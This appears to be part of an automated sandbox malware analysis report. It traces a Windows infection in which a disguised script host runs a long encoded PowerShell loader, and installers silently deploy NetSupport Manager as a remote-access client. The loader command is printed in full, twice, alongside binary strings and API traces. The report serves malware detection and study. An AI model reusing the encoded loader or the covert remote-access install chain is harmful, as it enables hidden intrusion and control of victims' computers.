                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI51C1.tmp "C:\Windows\Installer\MSI51C1.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EIJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4296 -ip 4296
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "c:\users\user\desktop\pyyidau.vbs.exe" -enc jabbaheadwb3ahmaywagad0aiabbafmaeqbzahqazqbtac4arabpageazwbuag8acwb0agkaywbzac4auabyag8aywblahmacwbdadoaogbhaguadabdahuacgbyaguabgb0afaacgbvagmazqbzahmakaapac4atqbhagkabgbnag8azab1agwazqauaeyaaqbsaguatgbhag0azqauafiazqbwagwayqbjaguakaanac4azqb4aguajwasaccajwapadsajabhahkaaqblahaazwbrahcadgbyacaapqagagcazqb0ac0aywbvag4adablag4adaagacqaqqbxahcadwbzagmaiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0atabhahmadaagadeaowagacqawabzagwabqb3ag0abwbxagcaawb6acaapqagafsauwb5ahmadablag0algbdag8abgb2aguacgb0af0aoga6aeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakaecaeqbpaguacabnagsadwb2ahialgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakaekadwbxagiadwbjacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtacgaiaasacaajabyahmababtahcabqbvaheazwbrahoaiaapadsajabfag0aygbtaguacwbqahmabaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqaugb3ahaadqb4ahcayqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbdag8abqbwahiazqbzahmaaqbvag4algbhahoaaqbwafmadabyaguayqbtacaajabjahcacqbiahcaywasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqaugb3ahaadqb4ahcayqauaemabwbwahkavabvacgaiaakaeuabqbiag0azqbzagoacwbsacaakqa7acqaugb3ahaadqb4ahcayqauaemababvahmazqaoackaowakaekadwbxagiadwbjac4aqwbsag8acwblacgakqa7afsaygb5ahqazqbbaf0axqagacqawabzagwabqb3ag0abwbxagcaawb6acaapqagacqarqbtagiabqblahmaagbzagwalgbuag8aqqbyahiayqb5acgakqa7afsaqqbyahiayqb5af0aoga6afiazqb2aguacgbzaguakaakafgacwbsag0adwbtag8acqbnagsaegapadsaiaakae4azgbragyazwb0ahqacgagad0aiabbafmaeqbzahqazqbtac4avaboahiazqbhagqaaqbuagcalgbuaggacgblageazabdadoaogbhaguadabeag8abqbhagkabgaoackalgbmag8ayqbkacgajabyahmababtahcabqbvaheazwbrahoakqa7acaajabbahyazgbuahgadqbrag4acgbtag0aiaa9acaajaboagyaawbmagcadab0ahialgbfag4adabyahkauabvagkabgb0adsaiabbafmaeqbzahqazqbtac4arablagwazqbnageadablaf0aoga6aemacgblageadablaeqazqbsaguazwbhahqazqaoafsaqqbjahqaaqbvag4axqasacaajabbahyazgbuahgadqbrag4acgbtag0algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakaeeadgbmag4aeab1agsabgbyag0abqauae4ayqbtaguakqauaeqaeqbuageabqbpagmasqbuahyabwbraguakaapacaafaagae8adqb0ac0atgb1agwabaa=
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI3FCC.tmp "c:\windows\installer\msi3fcc.tmp" /g"c:\program files (x86)\netsupport\netsupport manager\" /ev"netsupport school" /ef".\log files" /ef".\bookmarks" /ef".\tests" /ef".\store" /ef".\inv" /ef".\resources" /ef".\help" /ef".\image" /ef".\sound" /ef".\video" /ea /ex /ec /q /v /q /i *
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "c:\users\user\desktop\pyyidau.vbs.exe" -enc jabbaheadwb3ahmaywagad0aiabbafmaeqbzahqazqbtac4arabpageazwbuag8acwb0agkaywbzac4auabyag8aywblahmacwbdadoaogbhaguadabdahuacgbyaguabgb0afaacgbvagmazqbzahmakaapac4atqbhagkabgbnag8azab1agwazqauaeyaaqbsaguatgbhag0azqauafiazqbwagwayqbjaguakaanac4azqb4aguajwasaccajwapadsajabhahkaaqblahaazwbrahcadgbyacaapqagagcazqb0ac0aywbvag4adablag4adaagacqaqqbxahcadwbzagmaiab8acaauwblagwazqbjahqalqbpagiaagblagmadaagac0atabhahmadaagadeaowagacqawabzagwabqb3ag0abwbxagcaawb6acaapqagafsauwb5ahmadablag0algbdag8abgb2aguacgb0af0aoga6aeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaakaecaeqbpaguacabnagsadwb2ahialgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakaekadwbxagiadwbjacaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtacgaiaasacaajabyahmababtahcabqbvaheazwbrahoaiaapadsajabfag0aygbtaguacwbqahmabaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqaugb3ahaadqb4ahcayqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbdag8abqbwahiazqbzahmaaqbvag4algbhahoaaqbwafmadabyaguayqbtacaajabjahcacqbiahcaywasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqaugb3ahaadqb4ahcayqauaemabwbwahkavabvacgaiaakaeuabqbiag0azqbzagoacwbsacaakqa7acqaugb3ahaadqb4ahcayqauaemababvahmazqaoackaowakaekadwbxagiadwbjac4aqwbsag8acwblacgakqa7afsaygb5ahqazqbbaf0axqagacqawabzagwabqb3ag0abwbxagcaawb6acaapqagacqarqbtagiabqblahmaagbzagwalgbuag8aqqbyahiayqb5acgakqa7afsaqqbyahiayqb5af0aoga6afiazqb2aguacgbzaguakaakafgacwbsag0adwbtag8acqbnagsaegapadsaiaakae4azgbragyazwb0ahqacgagad0aiabbafmaeqbzahqazqbtac4avaboahiazqbhagqaaqbuagcalgbuaggacgblageazabdadoaogbhaguadabeag8abqbhagkabgaoackalgbmag8ayqbkacgajabyahmababtahcabqbvaheazwbrahoakqa7acaajabbahyazgbuahgadqbrag4acgbtag0aiaa9acaajaboagyaawbmagcadab0ahialgbfag4adabyahkauabvagkabgb0adsaiabbafmaeqbzahqazqbtac4arablagwazqbnageadablaf0aoga6aemacgblageadablaeqazqbsaguazwbhahqazqaoafsaqqbjahqaaqbvag4axqasacaajabbahyazgbuahgadqbrag4acgbtag0algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakaeeadgbmag4aeab1agsabgbyag0abqauae4ayqbtaguakqauaeqaeqbuageabqbpagmasqbuahyabwbraguakaapacaafaagae8adqb0ac0atgb1agwabaa=Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI3FCC.tmp "c:\windows\installer\msi3fcc.tmp" /g"c:\program files (x86)\netsupport\netsupport manager\" /ev"netsupport school" /ef".\log files" /ef".\bookmarks" /ef".\tests" /ef".\store" /ef".\inv" /ef".\resources" /ef".\help" /ef".\image" /ef".\sound" /ef".\video" /ea /ex /ec /q /v /q /i * Jump to behavior
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B1A250 GetModuleFileNameW,_wcschr,GetCurrentProcessId,wsprintfW,CreateEventW,CreateEventW,GetLastError,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,wsprintfW,CreateEventW,GetLastError,CloseHandle,wsprintfW,CreateEventW,LocalFree,CreateEventW,CreateEventW,CreateEventW,CreateThread,SetThreadPriority,28_2_00B1A250
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B1A6C0 AllocateAndInitializeSid,LoadLibraryW,GetProcAddress,FreeSid,FreeLibrary,SetLastError,28_2_00B1A6C0
                                Source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.drBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a+tca+tLogSOFTWARE\Productive Computer Insight\%swinstallwinst32Log=winst32.log%04d-%02d-%02d %02d:%02d:%02d.%03d defaultGetNativeSystemInfo missingcpu type is %d, probably not x64cpu is x64, setting wow64=TRUEiswow64process, setting wow64=TRUEPCISYS started okPCISYS created okPCISYS not created, already existsPCISYS not created, e=%dsystem32\drivers\pcisys.sysVideo InitPendingFileRenameOperationsSYSTEM\CurrentControlSet\Control\Session Manager\Client32Provider.dll\cicClient32Provider.dllRegisterClient32Provider reg=%dSoftware\Policies\NetSupport\Client\StandardScreenScrapeDllInstall(%s) inst=%d, cmd=%lsDllInstallInstallShellExt Doneerror - delete on restartCopy errorCopy %s to %sRename %s to %s - %sDelete %s - %serrorokPCIShellExt.newPCIShellExt.oldPCIShellExt.dllInstallShellExt %d, doshell=%dShell_TrayWndUnloading %s
                                Source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo\tempfile.$$$\autoexec.nt\autoexec.tmpGetSystemWow64DirectoryAkernel32*old_wndproc == fpe:\nsmsrc\nsm\1410\1410\nt\winst32.cPROGMANrb+.lnk\Profiles\All Users\Start Menu\Programs\YesOnNSMWControl32NSMMainSeShutdownPrivilegebufAssert failed, file %hs, line %d
                                Source: MSI264F.tmp, MSI2BE4.tmp, MSI3FCC.tmpBinary or memory string: Shell_TrayWnd
                                Source: PCICL32.DLL.22.drBinary or memory string: Progman
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpBinary or memory string: 1jFoxitReaderSubmitPeakFrameIntelNSM AppBar Callback MessageShell_TrayWnd
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpBinary or memory string: 1EjProgman
                                Source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: kProgman
                                Source: winst64.exe, 00000021.00000000.2613624042.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, winst64.exe, 00000021.00000002.2615985301.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: %04d-%02d-%02d %02d:%02d:%02d.%03d defaultPCISYS started okPCISYS created okPCISYS not created, already existsPCISYS not created, e=%dsystem32\drivers\pcisys.sysVideo InitPendingFileRenameOperationsSYSTEM\CurrentControlSet\Control\Session ManagerDllUnregisterServerDllRegisterServer\Client32Provider.dll\cicClient32Provider.dllRegisterClient32Provider reg=%dclient32.inirtclient32u.iniSoftware\Policies\NetSupport\Client\StandardclientScreenScrapeDllInstall(%s) inst=%d, cmd=%lsDllInstallInstallShellExt Doneerror - delete on restartCopy errorCopy %s to %sRename %s to %s - %sDelete %s - %sokerrorPCIShellExt64.newPCIShellExt64.oldPCIShellExt64.dllInstallShellExt %d, doshell=%dShell_TrayWndUnloading %s
                                Source: MSI264F.tmp, MSI2BE4.tmp, MSI3FCC.tmpBinary or memory string: PROGMAN
                                Source: pcicfgui_client.exe, 00000024.00000002.2676926399.000000006B852000.00000002.00000001.01000000.0000001F.sdmpBinary or memory string: Sorry, this is not supported on versions of Windows NT before 4.0. Please refer to the help file for details on how to do this in Program Manager. Configure TCP/IP Client Browsing+&Broadcast Addresses (or Client Addresses):.Print Files (*.prn)|*.prn|All Files (*.*)|*.*|.Sound Files (*.wav)|*.wav|All Files (*.*)|*.*|
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanError closing winsta, e=%d
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,28_2_00B586E2
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,28_2_00B587BC
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_00B52744
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,28_2_00B528E0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,28_2_00B52839
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,28_2_00B5293B
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,28_2_00B52BF8
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,28_2_00B52B0C
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,28_2_00B52C9B
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,28_2_00B52C5F
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: GetLocaleInfoA,28_2_00B5BE77
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,30_2_004C86E2
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,30_2_004C2744
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,30_2_004C87BC
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,30_2_004C2839
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,30_2_004C28E0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,30_2_004C293B
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,30_2_004C2B0C
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,30_2_004C2BF8
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,30_2_004C2C5F
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,30_2_004C2C9B
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: GetLocaleInfoA,30_2_004CBE77
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,31_2_00EBC73C
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,31_2_00EBC8D8
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,31_2_00EBC831
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,31_2_00EBC933
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,31_2_00EBCBF0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: EnumSystemLocalesA,31_2_00EBCBC6
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,31_2_00EBCB04
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,31_2_00EBCC93
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,31_2_00EBCC57
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,31_2_00EC576A
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,31_2_00EC5844
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: GetLocaleInfoA,31_2_00EC5E2D
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,32_2_001E86E2
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,32_2_001E2744
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,32_2_001E87BC
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,32_2_001E2839
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,32_2_001E28E0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,32_2_001E293B
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,32_2_001E2B0C
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_001E2BF8
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,32_2_001E2C5F
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,32_2_001E2C9B
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: GetLocaleInfoA,32_2_001EBE77
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0018D970 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,SetupDiGetDeviceRegistryPropertyW,__wcsicoll,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,32_2_0018D970
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Installer\MSI3FCC.tmpQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Installer\MSI3FCC.tmpQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2F030 GetLocalTime,wsprintfW,wsprintfW,wvsprintfW,wsprintfW,_malloc,InitializeCriticalSection,EnterCriticalSection,GetCurrentDirectoryW,__wcsnicmp,GetKeyState,GetKeyState,GetKeyState,RegOpenKeyExW,RegQueryValueExW,wsprintfW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,LeaveCriticalSection,_fputs,_free,OutputDebugStringW,LeaveCriticalSection,28_2_00B2F030
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B25490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,28_2_00B25490
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B40EEB __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,28_2_00B40EEB
